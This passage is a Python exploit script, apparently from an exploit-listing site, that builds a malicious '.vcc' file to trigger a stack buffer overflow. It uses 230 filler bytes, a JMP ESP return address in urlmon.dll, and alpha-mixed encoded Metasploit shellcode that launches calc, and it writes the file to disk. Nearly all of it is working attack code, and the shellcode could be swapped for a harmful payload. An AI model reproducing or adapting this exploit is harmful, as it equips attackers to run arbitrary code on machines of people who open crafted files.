"\x49\x46\x41\x3e\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x46\x69"
"\x6c\x65\x46\x6f\x72\x6d\x61\x74\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b"
"\x44\x69\x72\x73\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b\x44\x69\x72\x45"
"\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x73\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d"
"\x0a\x3c\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65"
"\x72\x6e\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61"
"\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62"
"\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x4d\x61\x69"
"\x6e\x3e\x0d\x0a"
)
buffersize = 1000
payload = "\x41" * 230
# JMP ESP [urlmon.dll]
payload += struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=calc R |msfencode BufferRegister=ESP -e x=
86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=1)
#
payload += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x69\x78" +
"\x4d\x59\x37\x70\x63\x30\x55\x50\x51\x70\x6b\x39\x38\x65" +
"\x76\x51\x38\x52\x73\x54\x4e\x6b\x32\x72\x46\x50\x6c\x4b" +
"\x43\x62\x74\x4c\x6c\x4b\x32\x72\x74\x54\x6c\x4b\x74\x32" +
"\x37\x58\x56\x6f\x4f\x47\x52\x6a\x65\x76\x66\x51\x49\x6f" +
"\x36\x51\x39\x50\x4e\x4c\x37\x4c\x35\x31\x43\x4c\x57\x72" +
"\x56\x4c\x61\x30\x4f\x31\x4a\x6f\x46\x6d\x67\x71\x68\x47" +
"\x6d\x32\x68\x70\x43\x62\x53\x67\x6e\x6b\x56\x32\x62\x30" +
"\x4e\x6b\x72\x62\x55\x6c\x45\x51\x6e\x30\x4e\x6b\x61\x50" +
"\x70\x78\x6b\x35\x6f\x30\x63\x44\x63\x7a\x33\x31\x6a\x70" +
"\x70\x50\x4c\x4b\x62\x68\x65\x48\x6c\x4b\x33\x68\x37\x50" +
"\x47\x71\x39\x43\x6b\x53\x35\x6c\x77\x39\x4c\x4b\x34\x74" +
"\x6e\x6b\x73\x31\x6a\x76\x50\x31\x49\x6f\x55\x61\x4b\x70" +
"\x6e\x4c\x69\x51\x5a\x6f\x74\x4d\x56\x61\x5a\x67\x35\x68" +
"\x6b\x50\x33\x45\x38\x74\x57\x73\x33\x4d\x59\x68\x75\x6b" +
"\x31\x6d\x34\x64\x44\x35\x4b\x52\x31\x48\x4c\x4b\x46\x38" +
"\x65\x74\x77\x71\x6a\x73\x35\x36\x6e\x6b\x56\x6c\x30\x4b" +
"\x4c\x4b\x62\x78\x77\x6c\x35\x51\x59\x43\x6c\x4b\x33\x34" +
"\x4c\x4b\x73\x31\x6e\x30\x6b\x39\x72\x64\x44\x64\x75\x74" +
"\x43\x6b\x51\x4b\x65\x31\x52\x79\x62\x7a\x53\x61\x6b\x4f" +
"\x69\x70\x56\x38\x33\x6f\x73\x6a\x4c\x4b\x64\x52\x38\x6b" +
"\x6b\x36\x43\x6d\x51\x7a\x63\x31\x6c\x4d\x6c\x45\x68\x39" +
"\x57\x70\x47\x70\x45\x50\x32\x70\x55\x38\x54\x71\x4e\x6b" +
"\x50\x6f\x6f\x77\x4b\x4f\x59\x45\x6f\x4b\x58\x70\x6c\x75" +
"\x4f\x52\x43\x66\x70\x68\x6e\x46\x6e\x75\x6f\x4d\x4f\x6d" +
"\x4b\x4f\x59\x45\x75\x6c\x47\x76\x33\x4c\x55\x5a\x4d\x50" +
"\x6b\x4b\x59\x70\x64\x35\x73\x35\x6f\x4b\x73\x77\x35\x43" +
"\x64\x32\x62\x4f\x71\x7a\x43\x30\x33\x63\x4b\x4f\x6e\x35" +
"\x62\x43\x73\x51\x32\x4c\x31\x73\x53\x30\x41\x41"
)
payload += "\x41" * (buffersize - len(payload)) 
sploit = header + payload  + footer
 
print "[*] Creating .vcc file"
 
try:
	print "[+]Creating Exploit File...\n"
	file = open("noname1.vcc","wb") 
	file.write(sploit)
	file.close
	print "[+]File noname1.vcc create successfully.\n"
except:	
	print "**[-]Error: #{$!}\n"

Navigation

Suggest Exploit

Services By CQR